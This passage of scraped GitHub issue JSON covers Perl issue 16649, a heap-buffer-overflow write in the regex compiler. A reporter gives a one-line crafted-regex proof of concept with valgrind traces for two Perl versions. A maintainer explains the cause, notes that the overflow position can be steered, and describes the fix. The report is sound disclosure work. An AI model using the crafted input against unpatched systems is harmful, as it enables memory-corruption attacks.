RT133423$\u003c/p\u003e","bodyVersion":"323dd0399cdfff77d2296cb04aab48cc64d031118cac256ff321a0c11c89d951","createdAt":"2018-08-04T09:32:13Z","__isReactable":"Issue","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"viewerCanUpdateMetadata":false,"viewerCanComment":false,"viewerCanAssign":false,"viewerCanLabel":false,"__isIssueOrPullRequest":"Issue","projectItemsNext":{"edges":[],"pageInfo":{"endCursor":null,"hasNextPage":false}},"viewerCanSetMilestone":false,"isPinned":false,"viewerCanDelete":false,"viewerCanTransfer":false,"viewerCanConvertToDiscussion":false,"viewerCanLock":false,"viewerCanType":false,"frontTimelineItems":{"pageInfo":{"hasNextPage":true,"endCursor":"Y3Vyc29yOnYyOpPPAAABZg8K98gAqTU0NDA5NzQ2MQ=="},"totalCount":33,"edges":[{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097440,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ0MA==","body":"### From @Etsukata\n\n\\# Summary\n\n\\- a crafted regular 
expression can cause heap\\-buffer\\-overflow write during\ncompilation\n\n\\# Affected Versions\n\n\\- 5\\.29\\.1\n\\- 5\\.28\\.0\n\\- 5\\.26\\.2\n\n\\# PoC\n\n\\- 5\\.28\\.0\n\\`\\`\\`\n$ valgrind \\-\\-leak\\-check=no perl \\-le 'my $r =\n\"\\(?\\[\\(?\\-\u0026#8203;:\\(?\\[\\\\\\\\\\\\x00\\]\\)\\)\\\\\\\\\\]\\\\x00|2\\[^^\\]\\\\x80\\\\x80\\\\x80\\\\x80\\]\\)R\\.\\\\\\\\670\"; qr/$r/'\n\n==6867== Memcheck\\, a memory error detector\n==6867== Copyright \\(C\\) 2002\\-2017\\, and GNU GPL'd\\, by Julian Seward et al\\.\n==6867== Using Valgrind\\-3\\.13\\.0 and LibVEX; rerun with \\-h for copyright info\n==6867== Command\u0026#8203;: perl \\-le my\\\\ $r\\\\ =\\\\\n\"\\(?\\[\\(?\\-\u0026#8203;:\\(?\\[\\\\\\\\\\\\\\\\\\\\\\\\x00\\]\\)\\)\\\\\\\\\\\\\\\\\\]\\\\\\\\x00|2\\[^^\\]\\\\\\\\x80\\\\\\\\x80\\\\\\\\x80\\\\\\\\x80\\]\\)R\\.\\\\\\\\\\\\\\\\670\";\\\\\nqr/$r/\n==6867==\nThe regex\\_sets feature is experimental in regex; marked by \\\u003c\\-\\- HERE in\nm/\\(?\\[ \\\u003c\\-\\- HERE \\(?\\-\u0026#8203;:\\(?\\[\\\\\\]\\)\\)\\\\\\]|2\\[^^\\]????\\]\\)R\\.\\\\670/ at \\-e line 1\\.\nThe regex\\_sets feature is experimental in regex; marked by \\\u003c\\-\\- HERE in\nm/\\(?\\[\\(?\\-\u0026#8203;:\\(?\\[ \\\u003c\\-\\- HERE \\\\\\]\\)\\)\\\\\\]|2\\[^^\\]????\\]\\)R\\.\\\\670/ at \\-e line 1\\.\n==6867== Invalid write of size 1\n==6867== at 0x4C13FD\u0026#8203;: S\\_regatom \\(regcomp\\.c\u0026#8203;:14041\\)\n==6867== by 0x4C48A8\u0026#8203;: S\\_regpiece \\(regcomp\\.c\u0026#8203;:12003\\)\n==6867== by 0x4C48A8\u0026#8203;: S\\_regbranch \\(regcomp\\.c\u0026#8203;:11931\\)\n==6867== by 0x4B3A02\u0026#8203;: S\\_reg \\(regcomp\\.c\u0026#8203;:11708\\)\n==6867== by 0x4D6160\u0026#8203;: Perl\\_re\\_op\\_compile \\(regcomp\\.c\u0026#8203;:7434\\)\n==6867== by 0x58549B\u0026#8203;: Perl\\_pp\\_regcomp \\(pp\\_ctl\\.c\u0026#8203;:110\\)\n==6867== by 0x4DD269\u0026#8203;: Perl\\_runops\\_debug \\(dump\\.c\u0026#8203;:2536\\)\n==6867== by 0x4543AD\u0026#8203;: 
S\\_run\\_body \\(perl\\.c\u0026#8203;:2694\\)\n==6867== by 0x4543AD\u0026#8203;: perl\\_run \\(perl\\.c\u0026#8203;:2617\\)\n==6867== by 0x41FA49\u0026#8203;: main \\(perlmain\\.c\u0026#8203;:122\\)\n==6867== Address 0x7d36680 is 0 bytes after a block of size 160 alloc'd\n==6867== at 0x4C2EBAB\u0026#8203;: malloc \\(vg\\_replace\\_malloc\\.c\u0026#8203;:299\\)\n==6867== by 0x4E6400\u0026#8203;: Perl\\_safesysmalloc \\(util\\.c\u0026#8203;:153\\)\n==6867== by 0x4D598D\u0026#8203;: Perl\\_re\\_op\\_compile \\(regcomp\\.c\u0026#8203;:7280\\)\n==6867== by 0x58549B\u0026#8203;: Perl\\_pp\\_regcomp \\(pp\\_ctl\\.c\u0026#8203;:110\\)\n==6867== by 0x4DD269\u0026#8203;: Perl\\_runops\\_debug \\(dump\\.c\u0026#8203;:2536\\)\n==6867== by 0x4543AD\u0026#8203;: S\\_run\\_body \\(perl\\.c\u0026#8203;:2694\\)\n==6867== by 0x4543AD\u0026#8203;: perl\\_run \\(perl\\.c\u0026#8203;:2617\\)\n==6867== by 0x41FA49\u0026#8203;: main \\(perlmain\\.c\u0026#8203;:122\\)\n==6867==\npanic\u0026#8203;: reg\\_node overrun trying to emit 0\\, 7d36684\u003e=7d3667c at \\-e line 1\\.\n==6867==\n==6867== HEAP SUMMARY\u0026#8203;:\n==6867== in use at exit\u0026#8203;: 154\\,595 bytes in 670 blocks\n==6867== total heap usage\u0026#8203;: 950 allocs\\, 280 frees\\, 200\\,836 bytes allocated\n==6867==\n==6867== For a detailed leak analysis\\, rerun with\u0026#8203;: \\-\\-leak\\-check=full\n==6867==\n==6867== For counts of detected and suppressed errors\\, rerun with\u0026#8203;: \\-v\n==6867== ERROR SUMMARY\u0026#8203;: 1 errors from 1 contexts \\(suppressed\u0026#8203;: 0 from 0\\)\n\\`\\`\\`\n\n\\- 5\\.26\\.2\n\\`\\`\\`\n$ valgrind \\-\\-leak\\-check=no perl \\-le 'my $r =\n\"\\(?\\[\\(?\\-\u0026#8203;:\\(?\\[\\\\\\\\\\\\x00\\]\\)\\)\\\\\\\\\\]\\\\x00|2\\[^^\\]\\\\x80\\\\x80\\\\x80\\\\x80\\]\\)R\\.\\\\\\\\670\"; qr/$r/'\n==19854== Memcheck\\, a memory error detector\n==19854== Copyright \\(C\\) 2002\\-2017\\, and GNU GPL'd\\, by Julian Seward et al\\.\n==19854== Using Valgrind\\-3\\.13\\.0 and 
LibVEX; rerun with \\-h for copyright info\n==19854== Command\u0026#8203;: perl \\-le my\\\\ $r\\\\ =\\\\\n\"\\(?\\[\\(?\\-\u0026#8203;:\\(?\\[\\\\\\\\\\\\\\\\\\\\\\\\x00\\]\\)\\)\\\\\\\\\\\\\\\\\\]\\\\\\\\x00|2\\[^^\\]\\\\\\\\x80\\\\\\\\x80\\\\\\\\x80\\\\\\\\x80\\]\\)R\\.\\\\\\\\\\\\\\\\670\";\\\\\nqr/$r/\n==19854==\nThe regex\\_sets feature is experimental in regex; marked by \\\u003c\\-\\- HERE in\nm/\\(?\\[ \\\u003c\\-\\- HERE \\(?\\-\u0026#8203;:\\(?\\[\\\\\\]\\)\\)\\\\\\]|2\\[^^\\]????\\]\\)R\\.\\\\670/ at \\-e line 1\\.\nThe regex\\_sets feature is experimental in regex; marked by \\\u003c\\-\\- HERE in\nm/\\(?\\[\\(?\\-\u0026#8203;:\\(?\\[ \\\u003c\\-\\- HERE \\\\\\]\\)\\)\\\\\\]|2\\[^^\\]????\\]\\)R\\.\\\\670/ at \\-e line 1\\.\n==19854== Invalid write of size 1\n==19854== at 0x5D9544\u0026#8203;: Perl\\_uvoffuni\\_to\\_utf8\\_flags \\(utf8\\.c\u0026#8203;:154\\)\n==19854== by 0x4BAB11\u0026#8203;: S\\_regatom \\(regcomp\\.c\u0026#8203;:13493\\)\n==19854== by 0x4BC535\u0026#8203;: S\\_regpiece \\(regcomp\\.c\u0026#8203;:11673\\)\n==19854== by 0x4BC535\u0026#8203;: S\\_regbranch \\(regcomp\\.c\u0026#8203;:11598\\)\n==19854== by 0x4ADBF8\u0026#8203;: S\\_reg \\(regcomp\\.c\u0026#8203;:11385\\)\n==19854== by 0x4D1531\u0026#8203;: Perl\\_re\\_op\\_compile \\(regcomp\\.c\u0026#8203;:7313\\)\n==19854== by 0x57D4AE\u0026#8203;: Perl\\_pp\\_regcomp \\(pp\\_ctl\\.c\u0026#8203;:108\\)\n==19854== by 0x4D8231\u0026#8203;: Perl\\_runops\\_debug \\(dump\\.c\u0026#8203;:2451\\)\n==19854== by 0x454455\u0026#8203;: S\\_run\\_body \\(perl\\.c\u0026#8203;:2532\\)\n==19854== by 0x454455\u0026#8203;: perl\\_run \\(perl\\.c\u0026#8203;:2455\\)\n==19854== by 0x421B89\u0026#8203;: main \\(perlmain\\.c\u0026#8203;:123\\)\n==19854== Address 0x6029970 is 0 bytes after a block of size 160 alloc'd\n==19854== at 0x4C2EBAB\u0026#8203;: malloc \\(vg\\_replace\\_malloc\\.c\u0026#8203;:299\\)\n==19854== by 0x4E1130\u0026#8203;: Perl\\_safesysmalloc \\(util\\.c\u0026#8203;:153\\)\n==19854== 
by 0x4D0E0C\u0026#8203;: Perl\\_re\\_op\\_compile \\(regcomp\\.c\u0026#8203;:7159\\)\n==19854== by 0x57D4AE\u0026#8203;: Perl\\_pp\\_regcomp \\(pp\\_ctl\\.c\u0026#8203;:108\\)\n==19854== by 0x4D8231\u0026#8203;: Perl\\_runops\\_debug \\(dump\\.c\u0026#8203;:2451\\)\n==19854== by 0x454455\u0026#8203;: S\\_run\\_body \\(perl\\.c\u0026#8203;:2532\\)\n==19854== by 0x454455\u0026#8203;: perl\\_run \\(perl\\.c\u0026#8203;:2455\\)\n==19854== by 0x421B89\u0026#8203;: main \\(perlmain\\.c\u0026#8203;:123\\)\n==19854==\npanic\u0026#8203;: reg\\_node overrun trying to emit 0\\, 6029974\u003e=602996c at \\-e line 1\\.\n==19854==\n==19854== HEAP SUMMARY\u0026#8203;:\n==19854== in use at exit\u0026#8203;: 124\\,573 bytes in 663 blocks\n==19854== total heap usage\u0026#8203;: 938 allocs\\, 275 frees\\, 169\\,419 bytes allocated\n==19854==\n==19854== For a detailed leak analysis\\, rerun with\u0026#8203;: \\-\\-leak\\-check=full\n==19854==\n==19854== For counts of detected and suppressed errors\\, rerun with\u0026#8203;: \\-v\n==19854== ERROR SUMMARY\u0026#8203;: 1 errors from 1 contexts \\(suppressed\u0026#8203;: 0 from 0\\)\n\\`\\`\\`","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/Etsukata/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/Etsukata\"\u003e@Etsukata\u003c/a\u003e\u003c/h3\u003e\n\u003cp dir=\"auto\"\u003e# Summary\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e- a crafted regular expression can cause heap-buffer-overflow write during\u003cbr\u003e\ncompilation\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# Affected Versions\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e- 5.29.1\u003cbr\u003e\n- 5.28.0\u003cbr\u003e\n- 5.26.2\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# PoC\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e- 5.28.0\u003cbr\u003e\n```\u003cbr\u003e\n$ valgrind --leak-check=no perl -le 'my $r 
=\u003cbr\u003e\n\"(?[(?-​:(?[\\\\\\x00]))\\\\]\\x00|2[^^]\\x80\\x80\\x80\\x80])R.\\\\670\"; qr/$r/'\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e==6867== Memcheck, a memory error detector\u003cbr\u003e\n==6867== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.\u003cbr\u003e\n==6867== Using Valgrind-3.13.0 and LibVEX; rerun with -h for copyright info\u003cbr\u003e\n==6867== Command​: perl -le my\\ $r\\ =\\\u003cbr\u003e\n\"(?[(?-​:(?[\\\\\\\\\\\\x00]))\\\\\\\\]\\\\x00|2[^^]\\\\x80\\\\x80\\\\x80\\\\x80])R.\\\\\\\\670\";\\\u003cbr\u003e\nqr/$r/\u003cbr\u003e\n==6867==\u003cbr\u003e\nThe regex_sets feature is experimental in regex; marked by \u0026lt;-- HERE in\u003cbr\u003e\nm/(?[ \u0026lt;-- HERE (?-​:(?[\\]))\\]|2[^^]????])R.\\670/ at -e line 1.\u003cbr\u003e\nThe regex_sets feature is experimental in regex; marked by \u0026lt;-- HERE in\u003cbr\u003e\nm/(?[(?-​:(?[ \u0026lt;-- HERE \\]))\\]|2[^^]????])R.\\670/ at -e line 1.\u003cbr\u003e\n==6867== Invalid write of size 1\u003cbr\u003e\n==6867== at 0x4C13FD​: S_regatom (regcomp.c​:14041)\u003cbr\u003e\n==6867== by 0x4C48A8​: S_regpiece (regcomp.c​:12003)\u003cbr\u003e\n==6867== by 0x4C48A8​: S_regbranch (regcomp.c​:11931)\u003cbr\u003e\n==6867== by 0x4B3A02​: S_reg (regcomp.c​:11708)\u003cbr\u003e\n==6867== by 0x4D6160​: Perl_re_op_compile (regcomp.c​:7434)\u003cbr\u003e\n==6867== by 0x58549B​: Perl_pp_regcomp (pp_ctl.c​:110)\u003cbr\u003e\n==6867== by 0x4DD269​: Perl_runops_debug (dump.c​:2536)\u003cbr\u003e\n==6867== by 0x4543AD​: S_run_body (perl.c​:2694)\u003cbr\u003e\n==6867== by 0x4543AD​: perl_run (perl.c​:2617)\u003cbr\u003e\n==6867== by 0x41FA49​: main (perlmain.c​:122)\u003cbr\u003e\n==6867== Address 0x7d36680 is 0 bytes after a block of size 160 alloc'd\u003cbr\u003e\n==6867== at 0x4C2EBAB​: malloc (vg_replace_malloc.c​:299)\u003cbr\u003e\n==6867== by 0x4E6400​: Perl_safesysmalloc (util.c​:153)\u003cbr\u003e\n==6867== by 0x4D598D​: Perl_re_op_compile (regcomp.c​:7280)\u003cbr\u003e\n==6867== 
by 0x58549B​: Perl_pp_regcomp (pp_ctl.c​:110)\u003cbr\u003e\n==6867== by 0x4DD269​: Perl_runops_debug (dump.c​:2536)\u003cbr\u003e\n==6867== by 0x4543AD​: S_run_body (perl.c​:2694)\u003cbr\u003e\n==6867== by 0x4543AD​: perl_run (perl.c​:2617)\u003cbr\u003e\n==6867== by 0x41FA49​: main (perlmain.c​:122)\u003cbr\u003e\n==6867==\u003cbr\u003e\npanic​: reg_node overrun trying to emit 0, 7d36684\u0026gt;=7d3667c at -e line 1.\u003cbr\u003e\n==6867==\u003cbr\u003e\n==6867== HEAP SUMMARY​:\u003cbr\u003e\n==6867== in use at exit​: 154,595 bytes in 670 blocks\u003cbr\u003e\n==6867== total heap usage​: 950 allocs, 280 frees, 200,836 bytes allocated\u003cbr\u003e\n==6867==\u003cbr\u003e\n==6867== For a detailed leak analysis, rerun with​: --leak-check=full\u003cbr\u003e\n==6867==\u003cbr\u003e\n==6867== For counts of detected and suppressed errors, rerun with​: -v\u003cbr\u003e\n==6867== ERROR SUMMARY​: 1 errors from 1 contexts (suppressed​: 0 from 0)\u003cbr\u003e\n```\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e- 5.26.2\u003cbr\u003e\n```\u003cbr\u003e\n$ valgrind --leak-check=no perl -le 'my $r =\u003cbr\u003e\n\"(?[(?-​:(?[\\\\\\x00]))\\\\]\\x00|2[^^]\\x80\\x80\\x80\\x80])R.\\\\670\"; qr/$r/'\u003cbr\u003e\n==19854== Memcheck, a memory error detector\u003cbr\u003e\n==19854== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.\u003cbr\u003e\n==19854== Using Valgrind-3.13.0 and LibVEX; rerun with -h for copyright info\u003cbr\u003e\n==19854== Command​: perl -le my\\ $r\\ =\\\u003cbr\u003e\n\"(?[(?-​:(?[\\\\\\\\\\\\x00]))\\\\\\\\]\\\\x00|2[^^]\\\\x80\\\\x80\\\\x80\\\\x80])R.\\\\\\\\670\";\\\u003cbr\u003e\nqr/$r/\u003cbr\u003e\n==19854==\u003cbr\u003e\nThe regex_sets feature is experimental in regex; marked by \u0026lt;-- HERE in\u003cbr\u003e\nm/(?[ \u0026lt;-- HERE (?-​:(?[\\]))\\]|2[^^]????])R.\\670/ at -e line 1.\u003cbr\u003e\nThe regex_sets feature is experimental in regex; marked by \u0026lt;-- HERE in\u003cbr\u003e\nm/(?[(?-​:(?[ \u0026lt;-- HERE 
\\]))\\]|2[^^]????])R.\\670/ at -e line 1.\u003cbr\u003e\n==19854== Invalid write of size 1\u003cbr\u003e\n==19854== at 0x5D9544​: Perl_uvoffuni_to_utf8_flags (utf8.c​:154)\u003cbr\u003e\n==19854== by 0x4BAB11​: S_regatom (regcomp.c​:13493)\u003cbr\u003e\n==19854== by 0x4BC535​: S_regpiece (regcomp.c​:11673)\u003cbr\u003e\n==19854== by 0x4BC535​: S_regbranch (regcomp.c​:11598)\u003cbr\u003e\n==19854== by 0x4ADBF8​: S_reg (regcomp.c​:11385)\u003cbr\u003e\n==19854== by 0x4D1531​: Perl_re_op_compile (regcomp.c​:7313)\u003cbr\u003e\n==19854== by 0x57D4AE​: Perl_pp_regcomp (pp_ctl.c​:108)\u003cbr\u003e\n==19854== by 0x4D8231​: Perl_runops_debug (dump.c​:2451)\u003cbr\u003e\n==19854== by 0x454455​: S_run_body (perl.c​:2532)\u003cbr\u003e\n==19854== by 0x454455​: perl_run (perl.c​:2455)\u003cbr\u003e\n==19854== by 0x421B89​: main (perlmain.c​:123)\u003cbr\u003e\n==19854== Address 0x6029970 is 0 bytes after a block of size 160 alloc'd\u003cbr\u003e\n==19854== at 0x4C2EBAB​: malloc (vg_replace_malloc.c​:299)\u003cbr\u003e\n==19854== by 0x4E1130​: Perl_safesysmalloc (util.c​:153)\u003cbr\u003e\n==19854== by 0x4D0E0C​: Perl_re_op_compile (regcomp.c​:7159)\u003cbr\u003e\n==19854== by 0x57D4AE​: Perl_pp_regcomp (pp_ctl.c​:108)\u003cbr\u003e\n==19854== by 0x4D8231​: Perl_runops_debug (dump.c​:2451)\u003cbr\u003e\n==19854== by 0x454455​: S_run_body (perl.c​:2532)\u003cbr\u003e\n==19854== by 0x454455​: perl_run (perl.c​:2455)\u003cbr\u003e\n==19854== by 0x421B89​: main (perlmain.c​:123)\u003cbr\u003e\n==19854==\u003cbr\u003e\npanic​: reg_node overrun trying to emit 0, 6029974\u0026gt;=602996c at -e line 1.\u003cbr\u003e\n==19854==\u003cbr\u003e\n==19854== HEAP SUMMARY​:\u003cbr\u003e\n==19854== in use at exit​: 124,573 bytes in 663 blocks\u003cbr\u003e\n==19854== total heap usage​: 938 allocs, 275 frees, 169,419 bytes allocated\u003cbr\u003e\n==19854==\u003cbr\u003e\n==19854== For a detailed leak analysis, rerun with​: 
--leak-check=full\u003cbr\u003e\n==19854==\u003cbr\u003e\n==19854== For counts of detected and suppressed errors, rerun with​: -v\u003cbr\u003e\n==19854== ERROR SUMMARY​: 1 errors from 1 contexts (suppressed​: 0 from 0)\u003cbr\u003e\n```\u003c/p\u003e","bodyVersion":"3149a8ebdf3319e9dc743cb2776a144cae42efa0e6f616d8e24e38a4a6d967a5","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097440","createdAt":"2018-08-04T09:32:13Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZQRHtUgAqTU0NDA
5NzQ0MA=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097441,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ0MQ==","body":"### From @khwilliamson\n\nI suspect this is a serious security issue\\. One can control where beyond the end of the buffer the write lands by adding \\\\x80's to the ones already there\\. But I'd be happy to be wrong about this\\.\n\nThe cause is one branch during the parsing leaves the parse pointer positioned one too far\\, and that causes the backslash to be skipped during pass2\\, which causes a '\\]' to be treated as a metacharacter instead of a literal\\.\n\nThe fix is to remove the single line that incorrectly increments the parse pointer\\. \nI don't know that this being an experimental feature has any bearing on it\\.\n\nThere is another thing\\. The minus sign in this case could have been caught as incorrect\\. But the same out\\-of\\-bounds writes would occur if a '^' replaced the minus\\, and that would be a correct use\\.\n\nKarl Williamson","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/khwilliamson/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/khwilliamson\"\u003e@khwilliamson\u003c/a\u003e\u003c/h3\u003e\n\u003cp dir=\"auto\"\u003eI suspect this is a serious security issue. One can control where beyond the end of the buffer the write lands by adding \\x80's to the ones already there. 
But I'd be happy to be wrong about this.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe cause is one branch during the parsing leaves the parse pointer positioned one too far, and that causes the backslash to be skipped during pass2, which causes a ']' to be treated as a metacharacter instead of a literal.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe fix is to remove the single line that incorrectly increments the parse pointer.\u003cbr\u003e\nI don't know that this being an experimental feature has any bearing on it.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThere is another thing. The minus sign in this case could have been caught as incorrect. But the same out-of-bounds writes would occur if a '^' replaced the minus, and that would be a correct use.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eKarl Williamson\u003c/p\u003e","bodyVersion":"c47018853182a7b03fa403365a25906ae1ccbf24de99555912c61b59cdd2960e","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097441","createdAt":"2018-08-15T18:01:24Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"c
ontent":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZT6_1SAAqTU0NDA5NzQ0MQ=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097442,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ0Mg==","body":"The RT System itself - Status changed from 'new' to 'open'\n\n","bodyHTML":"\u003cp dir=\"auto\"\u003eThe RT System itself - Status changed from 'new' to 
'open'\u003c/p\u003e","bodyVersion":"a8486952cad8274318179591829766a71e55450ce1f389d2f35ba2f01b9f4b94","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097442","createdAt":"2018-08-15T18:01:24Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZT6_1SAAqTU0NDA5NzQ0Mg=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097443,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SX
